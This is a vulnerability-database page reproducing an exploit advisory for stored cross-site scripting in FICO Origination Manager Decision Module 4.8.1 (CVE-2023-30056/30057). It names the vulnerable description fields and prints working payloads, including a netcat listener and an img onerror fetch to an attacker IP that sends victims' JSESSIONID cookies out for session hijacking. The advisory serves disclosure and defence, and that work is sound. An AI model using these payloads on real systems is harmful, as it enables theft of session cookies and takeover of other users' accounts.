Lucene search
+L

FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking

🗓️ 08 May 2023 00:00:00Reported by Matei JosephsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 325 Views

Stored-XSS vulnerability in FICO Origination Manager 4.8.1 leading to Session Hijacking

Related
Code
ReporterTitlePublishedViews
Family
0day.today
FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking Vulnerabilities
9 May 202300:00
zdt
Circl
CVE-2023-30056
10 May 202300:38
circl
Circl
CVE-2023-30057
10 May 202300:38
circl
CNNVD
FICO Origination Manager 跨站脚本漏洞
9 May 202300:00
cnnvd
CNNVD
FICO Origination Manager 授权问题漏洞
9 May 202300:00
cnnvd
CVE
CVE-2023-30056
9 May 202300:00
cve
CVE
CVE-2023-30057
9 May 202300:00
cve
Cvelist
CVE-2023-30056
9 May 202300:00
cvelist
Cvelist
CVE-2023-30057
9 May 202300:00
cvelist
EUVD
EUVD-2023-34489
3 Oct 202520:07
euvd
Rows per page
`# Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking  
# Date: 2023-05-07  
# Exploit Author: Matei Josephs  
# Vendor Homepage: https://www.fico.com/  
# Version: FICO Origination Manager Decision Module 4.8.1  
# CVE : CVE-2023-30056, CVE-2023-30057  
  
Introduction  
=================  
Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.  
  
Proof of Concept  
=================  
All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:   
<img/src/onerror=prompt(document.cookie)>  
  
An attacker could implement a cookie stealer as follows:  
On the attacker's machine:  
nc -lvnp <PORT>  
In one of the vulnerable description fields:  
<img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>  
  
When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation